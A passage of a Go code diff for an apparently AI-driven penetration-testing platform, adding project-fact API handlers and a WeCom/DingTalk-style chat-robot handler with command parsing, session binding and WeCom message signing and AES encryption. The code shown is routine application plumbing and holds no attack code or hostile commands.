!= nil { + if k := strings.TrimSpace(*req.FactKey); k != "" { + existing.FactKey = k + } + } + if req.Category != nil && strings.TrimSpace(*req.Category) != "" { + existing.Category = *req.Category + } + if req.Summary != nil && strings.TrimSpace(*req.Summary) != "" { + existing.Summary = *req.Summary + } + if req.ClearBody { + existing.Body = "" + } else if req.Body != nil { + existing.Body = *req.Body + } + if req.Confidence != nil && strings.TrimSpace(*req.Confidence) != "" { + existing.Confidence = *req.Confidence + } + if req.Pinned != nil { + existing.Pinned = *req.Pinned + } + if req.RelatedVulnerabilityID != nil { + existing.RelatedVulnerabilityID = *req.RelatedVulnerabilityID + } + updated, err := h.db.UpsertProjectFact(existing) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, updated) +} + +// DeleteFact DELETE /api/projects/:id/facts/:factId +func (h *ProjectHandler) DeleteFact(c *gin.Context) { + existing, err := h.db.GetProjectFact(c.Param("factId")) + if err != nil || existing.ProjectID != c.Param("id") { + c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"}) + return + } + if err := h.db.DeleteProjectFact(existing.ID); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"success": true}) +} + +type deprecateFactRequest struct { + FactKey string `json:"fact_key" binding:"required"` +} + +// DeprecateFact POST /api/projects/:id/facts/deprecate +func (h *ProjectHandler) DeprecateFact(c *gin.Context) { + var req deprecateFactRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if err := h.db.DeprecateProjectFact(c.Param("id"), req.FactKey); err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"success": true}) +} + +type restoreFactRequest struct { + FactKey string `json:"fact_key" binding:"required"` + Confidence string `json:"confidence"` // 可选:confirmed | tentative,默认 tentative +} + +// RestoreFact POST /api/projects/:id/facts/restore +func (h *ProjectHandler) RestoreFact(c *gin.Context) { + var req restoreFactRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if err := h.db.RestoreProjectFact(c.Param("id"), req.FactKey, req.Confidence); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"success": true}) +} diff --git a/internal/handler/project_context.go b/internal/handler/project_context.go new file mode 100644 index 00000000..1d0826d1 --- /dev/null +++ b/internal/handler/project_context.go @@ -0,0 +1,48 @@ +package handler + +import ( + "strings" + + "cyberstrike-ai/internal/project" + "go.uber.org/zap" +) + +// projectBlackboardBlock 根据对话 ID 构建项目事实索引块(用于注入 system prompt)。 +func (h *AgentHandler) projectBlackboardBlock(conversationID string) string { + if h == nil || h.db == nil || h.config == nil { + return "" + } + if !h.config.Project.Enabled { + return "" + } + conversationID = strings.TrimSpace(conversationID) + if conversationID == "" { + return "" + } + projectID, err := h.db.GetConversationProjectID(conversationID) + if err != nil || projectID == "" { + return "" + } + block, err := project.BuildProjectBlackboardBlock(h.db, projectID, h.config.Project) + if err != nil { + h.logger.Warn("构建项目黑板索引失败", zap.String("conversationId", conversationID), zap.Error(err)) + return "" + } + return strings.TrimSpace(block) +} + +// conversationProjectID 返回对话绑定的项目 ID;未绑定或查询失败时返回空字符串。 +func (h *AgentHandler) conversationProjectID(conversationID string) string { + if h == nil || h.db == nil { + return "" + } + conversationID = strings.TrimSpace(conversationID) + if conversationID == "" { + return "" + } + projectID, err := h.db.GetConversationProjectID(conversationID) + if err != nil { + return "" + } + return strings.TrimSpace(projectID) +} diff --git a/internal/handler/project_resolve.go b/internal/handler/project_resolve.go new file mode 100644 index 00000000..88885838 --- /dev/null +++ b/internal/handler/project_resolve.go @@ -0,0 +1,18 @@ +package handler + +import ( + "strings" + + "cyberstrike-ai/internal/config" +) + +// effectiveProjectID 请求/队列显式项目优先,否则使用 config.project.default_project_id。 +func effectiveProjectID(cfg *config.Config, explicit string) string { + if pid := strings.TrimSpace(explicit); pid != "" { + return pid + } + if cfg != nil { + return strings.TrimSpace(cfg.Project.DefaultProjectID) + } + return "" +} diff --git a/internal/handler/robot.go b/internal/handler/robot.go new file mode 100644 index 00000000..ca332869 --- /dev/null +++ b/internal/handler/robot.go @@ -0,0 +1,1191 @@ +package handler + +import ( + "bytes" + "context" + "crypto/aes" + "crypto/cipher" + "crypto/rand" + "crypto/sha1" + "encoding/base64" + "encoding/binary" + "encoding/json" + "encoding/xml" + "errors" + "fmt" + "io" + "net/http" + "sort" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +const ( + robotCmdHelp = "帮助" + robotCmdList = "列表" + robotCmdListAlt = "对话列表" + robotCmdSwitch = "切换" + robotCmdContinue = "继续" + robotCmdNew = "新对话" + robotCmdClear = "清空" + robotCmdCurrent = "当前" + robotCmdStop = "停止" + robotCmdRoles = "角色" + robotCmdRolesList = "角色列表" + robotCmdSwitchRole = "切换角色" + robotCmdDelete = "删除" + robotCmdVersion = "版本" + robotCmdProjects = "项目" + robotCmdProjectsList = "项目列表" + robotCmdBindProject = "绑定项目" + robotCmdNewProject = "新建项目" + robotCmdUnbindProject = "解除项目" +) + +// RobotHandler 企业微信/钉钉/飞书等机器人回调处理 +type RobotHandler struct { + config *config.Config + db *database.DB + agentHandler *AgentHandler + logger *zap.Logger + mu sync.RWMutex + sessions map[string]string // key: "platform_userID", value: conversationID + sessionRoles map[string]string // key: "platform_userID", value: roleName(默认"默认") + cancelMu sync.Mutex // 保护 runningCancels + runningCancels map[string]context.CancelFunc // key: "platform_userID", 用于停止命令中断任务 +} + +// NewRobotHandler 创建机器人处理器 +func NewRobotHandler(cfg *config.Config, db *database.DB, agentHandler *AgentHandler, logger *zap.Logger) *RobotHandler { + return &RobotHandler{ + config: cfg, + db: db, + agentHandler: agentHandler, + logger: logger, + sessions: make(map[string]string), + sessionRoles: make(map[string]string), + runningCancels: make(map[string]context.CancelFunc), + } +} + +// sessionKey 生成会话 key +func (h *RobotHandler) sessionKey(platform, userID string) string { + return platform + "_" + userID +} + +func (h *RobotHandler) loadSessionBinding(sk string) (convID, role string) { + if h.db == nil || strings.TrimSpace(sk) == "" { + return "", "" + } + binding, err := h.db.GetRobotSessionBinding(sk) + if err != nil { + h.logger.Warn("读取机器人会话绑定失败", zap.String("session_key", sk), zap.Error(err)) + return "", "" + } + if binding == nil { + return "", "" + } + return binding.ConversationID, binding.RoleName +} + +func (h *RobotHandler) persistSessionBinding(sk, convID, role string) { + if h.db == nil || strings.TrimSpace(sk) == "" || strings.TrimSpace(convID) == "" { + return + } + if err := h.db.UpsertRobotSessionBinding(sk, convID, role); err != nil { + h.logger.Warn("写入机器人会话绑定失败", zap.String("session_key", sk), zap.Error(err)) + } +} + +func (h *RobotHandler) deleteSessionBinding(sk string) { + if h.db == nil || strings.TrimSpace(sk) == "" { + return + } + if err := h.db.DeleteRobotSessionBinding(sk); err != nil { + h.logger.Warn("删除机器人会话绑定失败", zap.String("session_key", sk), zap.Error(err)) + } +} + +// getOrCreateConversation 获取或创建当前会话,title 用于新对话的标题(取用户首条消息前50字) +func (h *RobotHandler) getOrCreateConversation(platform, userID, title string) (convID string, isNew bool) { + sk := h.sessionKey(platform, userID) + h.mu.RLock() + convID = h.sessions[sk] + h.mu.RUnlock() + if convID != "" { + return convID, false + } + if persistedConvID, persistedRole := h.loadSessionBinding(sk); strings.TrimSpace(persistedConvID) != "" { + // 会话绑定持久化:服务重启后也可恢复当前对话和角色。 + h.mu.Lock() + h.sessions[sk] = persistedConvID + if strings.TrimSpace(persistedRole) != "" { + h.sessionRoles[sk] = persistedRole + } + h.mu.Unlock() + return persistedConvID, false + } + t := strings.TrimSpace(title) + if t == "" { + t = "新对话 " + time.Now().Format("01-02 15:04") + } else { + t = safeTruncateString(t, 50) + } + meta := database.ConversationCreateMeta{Source: "robot:" + platform} + meta.ProjectID = effectiveProjectID(h.config, "") + conv, err := h.db.CreateConversation(t, meta) + if err != nil { + h.logger.Warn("创建机器人会话失败", zap.Error(err)) + return "", false + } + convID = conv.ID + h.mu.Lock() + role := h.sessionRoles[sk] + h.sessions[sk] = convID + h.mu.Unlock() + h.persistSessionBinding(sk, convID, role) + return convID, true +} + +// setConversation 切换当前会话 +func (h *RobotHandler) setConversation(platform, userID, convID string) { + sk := h.sessionKey(platform, userID) + h.mu.Lock() + role := h.sessionRoles[sk] + h.sessions[sk] = convID + h.mu.Unlock() + h.persistSessionBinding(sk, convID, role) +} + +// getRole 获取当前用户使用的角色,未设置时返回"默认" +func (h *RobotHandler) getRole(platform, userID string) string { + sk := h.sessionKey(platform, userID) + h.mu.RLock() + role := h.sessionRoles[sk] + h.mu.RUnlock() + if strings.TrimSpace(role) != "" { + return role + } + if _, persistedRole := h.loadSessionBinding(sk); strings.TrimSpace(persistedRole) != "" { + h.mu.Lock() + h.sessionRoles[sk] = persistedRole + h.mu.Unlock() + return persistedRole + } + return "默认" +} + +// setRole 设置当前用户使用的角色 +func (h *RobotHandler) setRole(platform, userID, roleName string) { + sk := h.sessionKey(platform, userID) + h.mu.Lock() + h.sessionRoles[sk] = roleName + convID := h.sessions[sk] + h.mu.Unlock() + h.persistSessionBinding(sk, convID, roleName) +} + +// clearConversation 清空当前会话(切换到新对话) +func (h *RobotHandler) clearConversation(platform, userID string) (newConvID string) { + title := "新对话 " + time.Now().Format("01-02 15:04") + meta := database.ConversationCreateMeta{Source: "robot:" + platform + ":new"} + meta.ProjectID = effectiveProjectID(h.config, "") + conv, err := h.db.CreateConversation(title, meta) + if err != nil { + h.logger.Warn("创建新对话失败", zap.Error(err)) + return "" + } + h.setConversation(platform, userID, conv.ID) + return conv.ID +} + +// HandleMessage 处理用户输入,返回回复文本(供各平台 webhook 调用) +func (h *RobotHandler) HandleMessage(platform, userID, text string) (reply string) { + platform = strings.TrimSpace(platform) + userID = strings.TrimSpace(userID) + text = strings.TrimSpace(text) + if platform == "" { + platform = "unknown" + } + if userID == "" { + h.logger.Warn("机器人消息缺少用户标识,已拒绝处理", zap.String("platform", platform)) + return "无法识别发送者身份,请检查机器人事件订阅权限(需返回可用的用户 ID)。" + } + if text == "" { + return "请输入内容或发送「帮助」/ help 查看命令。" + } + + // 先尝试作为命令处理(支持中英文) + if cmdReply, ok := h.handleRobotCommand(platform, userID, text); ok { + return cmdReply + } + + // 普通消息:走 Agent + convID, _ := h.getOrCreateConversation(platform, userID, text) + if convID == "" { + return "无法创建或获取对话,请稍后再试。" + } + // 若对话标题为「新对话 xx:xx」格式(由「新对话」命令创建),将标题更新为首条消息内容,与 Web 端体验一致 + if conv, err := h.db.GetConversation(convID); err == nil && strings.HasPrefix(conv.Title, "新对话 ") { + newTitle := safeTruncateString(text, 50) + if newTitle != "" { + _ = h.db.UpdateConversationTitle(convID, newTitle) + } + } + ctx, cancel := context.WithTimeout(context.Background(), h.robotMessageTimeout()) + sk := h.sessionKey(platform, userID) + h.cancelMu.Lock() + h.runningCancels[sk] = cancel + h.cancelMu.Unlock() + defer func() { + cancel() + h.cancelMu.Lock() + delete(h.runningCancels, sk) + h.cancelMu.Unlock() + }() + role := h.getRole(platform, userID) + resp, newConvID, err := h.agentHandler.ProcessMessageForRobot(ctx, platform, convID, text, role) + if err != nil { + h.logger.Warn("机器人 Agent 执行失败", zap.String("platform", platform), zap.String("userID", userID), zap.Error(err)) + if errors.Is(err, context.Canceled) { + return "任务已取消。" + } + if errors.Is(err, context.DeadlineExceeded) { + return "任务执行超时,请稍后重试或精简本次请求范围。" + } + return "处理失败: " + err.Error() + } + if newConvID != convID { + h.setConversation(platform, userID, newConvID) + } + return resp +} + +func (h *RobotHandler) robotMessageTimeout() time.Duration { + // 机器人整次消息处理超时(与单次工具超时 agent.tool_timeout_minutes 解耦)。 + return 10 * time.Hour +} + +func (h *RobotHandler) cmdHelp() string { + var b strings.Builder + b.WriteString("【CyberStrikeAI 机器人命令】\n\n") + b.WriteString("【通用 General】\n") + b.WriteString("· 帮助 / help — 显示本帮助\n") + b.WriteString("· 版本 / version — 显示当前版本号\n") + b.WriteString("\n【对话 Conversation】\n") + b.WriteString("· 列表 / list — 列出所有对话标题与 ID\n") + b.WriteString("· 切换 / switch — 指定对话继续\n") + b.WriteString("· 新对话 / new — 开启新对话\n") + b.WriteString("· 清空 / clear — 清空当前上下文\n") + b.WriteString("· 当前 / current — 显示当前对话、角色与项目\n") + b.WriteString("· 停止 / stop — 中断当前任务\n") + b.WriteString("· 删除 / delete — 删除指定对话\n") + b.WriteString("\n【角色 Role】\n") + b.WriteString("· 角色 / roles — 列出所有可用角色\n") + b.WriteString("· 角色 <名> / role — 切换当前角色\n") + if h.projectsEnabled() { + b.WriteString("\n【项目 Project】\n") + b.WriteString("· 项目 / projects — 列出所有项目\n") + b.WriteString("· 新建项目 <名称> / new project — 创建并绑定当前对话\n") + b.WriteString("· 绑定项目 / bind project — 绑定到已有项目\n") + b.WriteString("· 解除项目 / unbind project — 解除项目绑定\n") + } + b.WriteString("\n──────────────\n") + b.WriteString("除以上命令外,直接输入内容将发送给 AI 进行渗透测试/安全分析。") + return b.String() +} + +func (h *RobotHandler) projectsEnabled() bool { + return h.config != nil && h.config.Project.Enabled +} + +func (h *RobotHandler) resolveProjectByIDOrName(idOrName string) (*database.Project, string) { + idOrName = strings.TrimSpace(idOrName) + if idOrName == "" { + return nil, "请指定项目 ID 或名称,例如:绑定项目 xxx-xxx" + } + if p, err := h.db.GetProject(idOrName); err == nil { + return p, "" + } + list, err := h.db.ListProjects("", "", 200, 0) + if err != nil { + return nil, "查询项目失败: " + err.Error() + } + var matches []*database.Project + for _, p := range list { + if p.Name == idOrName { + matches = append(matches, p) + } + } + switch len(matches) { + case 0: + return nil, fmt.Sprintf("项目「%s」不存在。发送「项目」查看列表。", idOrName) + case 1: + return matches[0], "" + default: + var b strings.Builder + b.WriteString(fmt.Sprintf("名称「%s」匹配到多个项目,请使用 ID 绑定:\n", idOrName)) + for _, p := range matches { + b.WriteString(fmt.Sprintf("· %s\n ID: %s\n", p.Name, p.ID)) + } + return nil, strings.TrimSuffix(b.String(), "\n") + } +} + +func (h *RobotHandler) formatProjectLabel(projectID string) string { + if strings.TrimSpace(projectID) == "" { + return "未绑定" + } + if p, err := h.db.GetProject(projectID); err == nil { + return fmt.Sprintf("「%s」 (%s)", p.Name, p.ID) + } + return projectID +} + +func (h *RobotHandler) cmdProjects() string { + if !h.projectsEnabled() { + return "项目功能未启用(config.project.enabled)。" + } + list, err := h.db.ListProjects("", "", 50, 0) + if err != nil { + return "获取项目列表失败: " + err.Error() + } + if len(list) == 0 { + return "暂无项目。发送「新建项目 <名称>」创建并绑定到当前对话。" + } + var b strings.Builder + b.WriteString("【项目列表】\n") + for i, p := range list { + if i >= 20 { + b.WriteString("… 仅显示前 20 条\n") + break + } + status := p.Status + if status == "" { + status = "active" + } + b.WriteString(fmt.Sprintf("· %s [%s]\n ID: %s\n", p.Name, status, p.ID)) + } + return strings.TrimSuffix(b.String(), "\n") +} + +func (h *RobotHandler) cmdBindProject(platform, userID, idOrName string) string { + if !h.projectsEnabled() { + return "项目功能未启用(config.project.enabled)。" + } + p, errMsg := h.resolveProjectByIDOrName(idOrName) + if p == nil { + return errMsg + } + convID, _ := h.getOrCreateConversation(platform, userID, "") + if convID == "" { + return "无法获取当前对话,请稍后再试。" + } + if err := h.db.SetConversationProjectID(convID, p.ID); err != nil { + return "绑定失败: " + err.Error() + } + return fmt.Sprintf("已将当前对话绑定到项目:「%s」\nID: %s", p.Name, p.ID) +} + +func (h *RobotHandler) cmdNewProject(platform, userID, name string) string { + if !h.projectsEnabled() { + return "项目功能未启用(config.project.enabled)。" + } + name = strings.TrimSpace(name) + if name == "" { + return "请指定项目名称,例如:新建项目 某目标渗透" + } + p := &database.Project{Name: name, Status: "active"} + created, err := h.db.CreateProject(p) + if err != nil { + return "创建项目失败: " + err.Error() + } + convID, _ := h.getOrCreateConversation(platform, userID, name) + if convID == "" { + return fmt.Sprintf("项目已创建:「%s」\nID: %s\n(绑定当前对话失败,请手动发送「绑定项目 %s」)", created.Name, created.ID, created.ID) + } + if err := h.db.SetConversationProjectID(convID, created.ID); err != nil { + return fmt.Sprintf("项目已创建:「%s」\nID: %s\n绑定失败: %s", created.Name, created.ID, err.Error()) + } + return fmt.Sprintf("已创建项目并绑定当前对话:「%s」\nID: %s", created.Name, created.ID) +} + +func (h *RobotHandler) cmdUnbindProject(platform, userID string) string { + if !h.projectsEnabled() { + return "项目功能未启用(config.project.enabled)。" + } + sk := h.sessionKey(platform, userID) + h.mu.RLock() + convID := h.sessions[sk] + h.mu.RUnlock() + if convID == "" { + if persistedConvID, _ := h.loadSessionBinding(sk); persistedConvID != "" { + convID = persistedConvID + } + } + if convID == "" { + return "当前没有进行中的对话,无需解除绑定。" + } + projectID, err := h.db.GetConversationProjectID(convID) + if err != nil { + return "获取对话项目失败: " + err.Error() + } + if strings.TrimSpace(projectID) == "" { + return "当前对话未绑定项目。" + } + if err := h.db.SetConversationProjectID(convID, ""); err != nil { + return "解除绑定失败: " + err.Error() + } + return "已解除当前对话的项目绑定。" +} + +func (h *RobotHandler) cmdList() string { + convs, err := h.db.ListConversations(50, 0, "") + if err != nil { + return "获取对话列表失败: " + err.Error() + } + if len(convs) == 0 { + return "暂无对话。发送任意内容将自动创建新对话。" + } + var b strings.Builder + b.WriteString("【对话列表】\n") + for i, c := range convs { + if i >= 20 { + b.WriteString("… 仅显示前 20 条\n") + break + } + b.WriteString(fmt.Sprintf("· %s\n ID: %s\n", c.Title, c.ID)) + } + return strings.TrimSuffix(b.String(), "\n") +} + +func (h *RobotHandler) cmdSwitch(platform, userID, convID string) string { + if convID == "" { + return "请指定对话 ID,例如:切换 xxx-xxx-xxx" + } + conv, err := h.db.GetConversation(convID) + if err != nil { + return "对话不存在或 ID 错误。" + } + h.setConversation(platform, userID, conv.ID) + return fmt.Sprintf("已切换到对话:「%s」\nID: %s", conv.Title, conv.ID) +} + +func (h *RobotHandler) cmdNew(platform, userID string) string { + newID := h.clearConversation(platform, userID) + if newID == "" { + return "创建新对话失败,请重试。" + } + return "已开启新对话,可直接发送内容。" +} + +func (h *RobotHandler) cmdClear(platform, userID string) string { + return h.cmdNew(platform, userID) +} + +func (h *RobotHandler) cmdStop(platform, userID string) string { + sk := h.sessionKey(platform, userID) + h.cancelMu.Lock() + cancel, ok := h.runningCancels[sk] + if ok { + delete(h.runningCancels, sk) + cancel() + } + h.cancelMu.Unlock() + if !ok { + return "当前没有正在执行的任务。" + } + return "已停止当前任务。" +} + +func (h *RobotHandler) cmdCurrent(platform, userID string) string { + h.mu.RLock() + convID := h.sessions[h.sessionKey(platform, userID)] + h.mu.RUnlock() + if convID == "" { + return "当前没有进行中的对话。发送任意内容将创建新对话。" + } + conv, err := h.db.GetConversation(convID) + if err != nil { + return "当前对话 ID: " + convID + "(获取标题失败)" + } + role := h.getRole(platform, userID) + reply := fmt.Sprintf("当前对话:「%s」\nID: %s\n当前角色: %s", conv.Title, conv.ID, role) + if h.projectsEnabled() { + projectID, _ := h.db.GetConversationProjectID(conv.ID) + reply += "\n当前项目: " + h.formatProjectLabel(projectID) + } + return reply +} + +func (h *RobotHandler) cmdRoles() string { + if h.config.Roles == nil || len(h.config.Roles) == 0 { + return "暂无可用角色。" + } + names := make([]string, 0, len(h.config.Roles)) + for name, role := range h.config.Roles { + if role.Enabled { + names = append(names, name) + } + } + if len(names) == 0 { + return "暂无可用角色。" + } + sort.Slice(names, func(i, j int) bool { + if names[i] == "默认" { + return true + } + if names[j] == "默认" { + return false + } + return names[i] < names[j] + }) + var b strings.Builder + b.WriteString("【角色列表】\n") + for _, name := range names { + role := h.config.Roles[name] + desc := role.Description + if desc == "" { + desc = "无描述" + } + b.WriteString(fmt.Sprintf("· %s — %s\n", name, desc)) + } + return strings.TrimSuffix(b.String(), "\n") +} + +func (h *RobotHandler) cmdSwitchRole(platform, userID, roleName string) string { + if roleName == "" { + return "请指定角色名称,例如:角色 渗透测试" + } + if h.config.Roles == nil { + return "暂无可用角色。" + } + role, exists := h.config.Roles[roleName] + if !exists { + return fmt.Sprintf("角色「%s」不存在。发送「角色」查看可用角色。", roleName) + } + if !role.Enabled { + return fmt.Sprintf("角色「%s」已禁用。", roleName) + } + h.setRole(platform, userID, roleName) + return fmt.Sprintf("已切换到角色:「%s」\n%s", roleName, role.Description) +} + +func (h *RobotHandler) cmdDelete(platform, userID, convID string) string { + if convID == "" { + return "请指定对话 ID,例如:删除 xxx-xxx-xxx" + } + sk := h.sessionKey(platform, userID) + h.mu.RLock() + currentConvID := h.sessions[sk] + h.mu.RUnlock() + if convID == currentConvID { + // 删除当前对话时,先清空会话绑定 + h.mu.Lock() + delete(h.sessions, sk) + delete(h.sessionRoles, sk) + h.mu.Unlock() + h.deleteSessionBinding(sk) + } + if err := h.db.DeleteConversation(convID); err != nil { + return "删除失败: " + err.Error() + } + return fmt.Sprintf("已删除对话 ID: %s", convID) +} + +func (h *RobotHandler) cmdVersion() string { + v := h.config.Version + if v == "" { + v = "未知" + } + return "CyberStrikeAI " + v +} + +// handleRobotCommand 处理机器人内置命令;若匹配到命令返回 (回复内容, true),否则返回 ("", false) +func (h *RobotHandler) handleRobotCommand(platform, userID, text string) (string, bool) { + switch { + case text == robotCmdHelp || text == "help" || text == "?" || text == "?": + return h.cmdHelp(), true + case text == robotCmdList || text == robotCmdListAlt || text == "list": + return h.cmdList(), true + case strings.HasPrefix(text, robotCmdSwitch+" ") || strings.HasPrefix(text, robotCmdContinue+" ") || strings.HasPrefix(text, "switch ") || strings.HasPrefix(text, "continue "): + var id string + switch { + case strings.HasPrefix(text, robotCmdSwitch+" "): + id = strings.TrimSpace(text[len(robotCmdSwitch)+1:]) + case strings.HasPrefix(text, robotCmdContinue+" "): + id = strings.TrimSpace(text[len(robotCmdContinue)+1:]) + case strings.HasPrefix(text, "switch "): + id = strings.TrimSpace(text[7:]) + default: + id = strings.TrimSpace(text[9:]) + } + return h.cmdSwitch(platform, userID, id), true + case text == robotCmdNew || text == "new": + return h.cmdNew(platform, userID), true + case text == robotCmdClear || text == "clear": + return h.cmdClear(platform, userID), true + case text == robotCmdCurrent || text == "current": + return h.cmdCurrent(platform, userID), true + case text == robotCmdStop || text == "stop": + return h.cmdStop(platform, userID), true + case text == robotCmdRoles || text == robotCmdRolesList || text == "roles": + return h.cmdRoles(), true + case strings.HasPrefix(text, robotCmdRoles+" ") || strings.HasPrefix(text, robotCmdSwitchRole+" ") || strings.HasPrefix(text, "role "): + var roleName string + switch { + case strings.HasPrefix(text, robotCmdRoles+" "): + roleName = strings.TrimSpace(text[len(robotCmdRoles)+1:]) + case strings.HasPrefix(text, robotCmdSwitchRole+" "): + roleName = strings.TrimSpace(text[len(robotCmdSwitchRole)+1:]) + default: + roleName = strings.TrimSpace(text[5:]) + } + return h.cmdSwitchRole(platform, userID, roleName), true + case strings.HasPrefix(text, robotCmdDelete+" ") || strings.HasPrefix(text, "delete "): + var convID string + if strings.HasPrefix(text, robotCmdDelete+" ") { + convID = strings.TrimSpace(text[len(robotCmdDelete)+1:]) + } else { + convID = strings.TrimSpace(text[7:]) + } + return h.cmdDelete(platform, userID, convID), true + case text == robotCmdVersion || text == "version": + return h.cmdVersion(), true + case text == robotCmdProjects || text == robotCmdProjectsList || text == "projects": + return h.cmdProjects(), true + case text == robotCmdUnbindProject || text == "unbind project": + return h.cmdUnbindProject(platform, userID), true + case strings.HasPrefix(text, robotCmdNewProject+" ") || strings.HasPrefix(text, "new project "): + var name string + if strings.HasPrefix(text, robotCmdNewProject+" ") { + name = strings.TrimSpace(text[len(robotCmdNewProject)+1:]) + } else { + name = strings.TrimSpace(text[len("new project "):]) + } + return h.cmdNewProject(platform, userID, name), true + case strings.HasPrefix(text, robotCmdBindProject+" ") || strings.HasPrefix(text, "bind project "): + var idOrName string + if strings.HasPrefix(text, robotCmdBindProject+" ") { + idOrName = strings.TrimSpace(text[len(robotCmdBindProject)+1:]) + } else { + idOrName = strings.TrimSpace(text[len("bind project "):]) + } + return h.cmdBindProject(platform, userID, idOrName), true + default: + return "", false + } +} + +// —————— 企业微信 —————— + +// wecomXML 企业微信回调 XML(明文模式下的简化结构;加密模式需先解密再解析) +type wecomXML struct { + ToUserName string `xml:"ToUserName"` + FromUserName string `xml:"FromUserName"` + CreateTime int64 `xml:"CreateTime"` + MsgType string `xml:"MsgType"` + Content string `xml:"Content"` + MsgID string `xml:"MsgId"` + AgentID int64 `xml:"AgentID"` + Encrypt string `xml:"Encrypt"` // 加密模式下消息在此 +} + +// wecomReplyXML 被动回复 XML(仅用于兼容,当前使用手动构造 XML) +type wecomReplyXML struct { + XMLName xml.Name `xml:"xml"` + ToUserName string `xml:"ToUserName"` + FromUserName string `xml:"FromUserName"` + CreateTime int64 `xml:"CreateTime"` + MsgType string `xml:"MsgType"` + Content string `xml:"Content"` +} + +// HandleWecomGET 企业微信 URL 校验(GET) +func (h *RobotHandler) HandleWecomGET(c *gin.Context) { + if !h.config.Robots.Wecom.Enabled { + c.String(http.StatusNotFound, "") + return + } + // Gin 的 Query() 会自动 URL 解码,拿到的就是正确的 base64 字符串 + echostr := c.Query("echostr") + msgSignature := c.Query("msg_signature") + timestamp := c.Query("timestamp") + nonce := c.Query("nonce") + + // 验证签名:将 token、timestamp、nonce、echostr 四个参数排序后拼接计算 SHA1 + signature := h.signWecomRequest(h.config.Robots.Wecom.Token, timestamp, nonce, echostr) + if signature != msgSignature { + h.logger.Warn("企业微信 URL 验证签名失败", zap.String("expected", msgSignature), zap.String("got", signature)) + c.String(http.StatusBadRequest, "invalid signature") + return + } + + if echostr == "" { + c.String(http.StatusBadRequest, "missing echostr") + return + } + + // 如果配置了 EncodingAESKey,说明是加密模式,需要解密 echostr + if h.config.Robots.Wecom.EncodingAESKey != "" { + decrypted, err := wecomDecrypt(h.config.Robots.Wecom.EncodingAESKey, echostr) + if err != nil { + h.logger.Warn("企业微信 echostr 解密失败", zap.Error(err)) + c.String(http.StatusBadRequest, "decrypt failed") + return + } + c.String(http.StatusOK, string(decrypted)) + return + } + + // 明文模式直接返回 echostr + c.String(http.StatusOK, echostr) +} + +// signWecomRequest 生成企业微信请求签名 +// 企业微信签名算法:将 token、timestamp、nonce、echostr 四个值排序后拼接成字符串,再计算 SHA1 +func (h *RobotHandler) signWecomRequest(token, timestamp, nonce, echostr string) string { + strs := []string{token, timestamp, nonce, echostr} + sort.Strings(strs) + s := strings.Join(strs, "") + hash := sha1.Sum([]byte(s)) + return fmt.Sprintf("%x", hash) +} + +// wecomDecrypt 企业微信消息解密(AES-256-CBC,PKCS7,明文格式:16字节随机+4字节长度+消息+corpID) +func wecomDecrypt(encodingAESKey, encryptedB64 string) ([]byte, error) { + key, err := base64.StdEncoding.DecodeString(encodingAESKey + "=") + if err != nil { + return nil, err + } + if len(key) != 32 { + return nil, fmt.Errorf("encoding_aes_key 解码后应为 32 字节") + } + ciphertext, err := base64.StdEncoding.DecodeString(encryptedB64) + if err != nil { + return nil, err + } + block, err := aes.NewCipher(key) + if err != nil { + return nil, err + } + iv := key[:16] + mode := cipher.NewCBCDecrypter(block, iv) + if len(ciphertext)%aes.BlockSize != 0 { + return nil, fmt.Errorf("密文长度不是块大小的倍数") + } + plain := make([]byte, len(ciphertext)) + mode.CryptBlocks(plain, ciphertext) + // 去除 PKCS7 填充 + n := int(plain[len(plain)-1]) + if n < 1 || n > 32 { + return nil, fmt.Errorf("无效的 PKCS7 填充") + } + plain = plain[:len(plain)-n] + // 企业微信格式:16 字节随机 + 4 字节长度(大端) + 消息 + corpID + if len(plain) < 20 { + return nil, fmt.Errorf("明文过短") + } + msgLen := binary.BigEndian.Uint32(plain[16:20]) + if int(20+msgLen) > len(plain) { + return nil, fmt.Errorf("消息长度越界") + } + return plain[20 : 20+msgLen], nil +} + +// wecomEncrypt 企业微信消息加密(AES-256-CBC,PKCS7,明文格式:16字节随机+4字节长度+消息+corpID) +func wecomEncrypt(encodingAESKey, message, corpID string) (string, error) { + key, err := base64.StdEncoding.DecodeString(encodingAESKey + "=") + if err != nil { + return "", err + } + if len(key) != 32 { + return "", fmt.Errorf("encoding_aes_key 解码后应为 32 字节") + } + // 构造明文:16 字节随机 + 4 字节长度 (大端) + 消息 + corpID + random := make([]byte, 16) + if _, err := rand.Read(random); err != nil { + // 降级方案:使用时间戳生成随机数 + for i := range random { + random[i] = byte(time.Now().UnixNano() % 256) + } + } + msgLen := len(message) + msgBytes := []byte(message) + corpBytes := []byte(corpID) + plain := make([]byte, 16+4+msgLen+len(corpBytes)) + copy(plain[:16], random) + binary.BigEndian.PutUint32(plain[16:20], uint32(msgLen)) + copy(plain[20:20+msgLen], msgBytes) + copy(plain[20+msgLen:], corpBytes) + // PKCS7 填充 + padding := aes.BlockSize - len(plain)%aes.BlockSize + pad := bytes.Repeat([]byte{byte(padding)}, padding) + plain = append(plain, pad...) + // AES-256-CBC 加密 + block, err := aes.NewCipher(key) + if err != nil { + return "", err + } + iv := key[:16] + ciphertext := make([]byte, len(plain)) + mode := cipher.NewCBCEncrypter(block, iv) + mode.CryptBlocks(ciphertext, plain) + return base64.StdEncoding.EncodeToString(ciphertext), nil +} + +// HandleWecomPOST 企业微信消息回调(POST),支持明文与加密模式 +func (h *RobotHandler) HandleWecomPOST(c *gin.Context) { + if !h.config.Robots.Wecom.Enabled { + h.logger.Debug("企业微信机器人未启用,跳过请求") + c.String(http.StatusOK, "") + return + } + // 从 URL 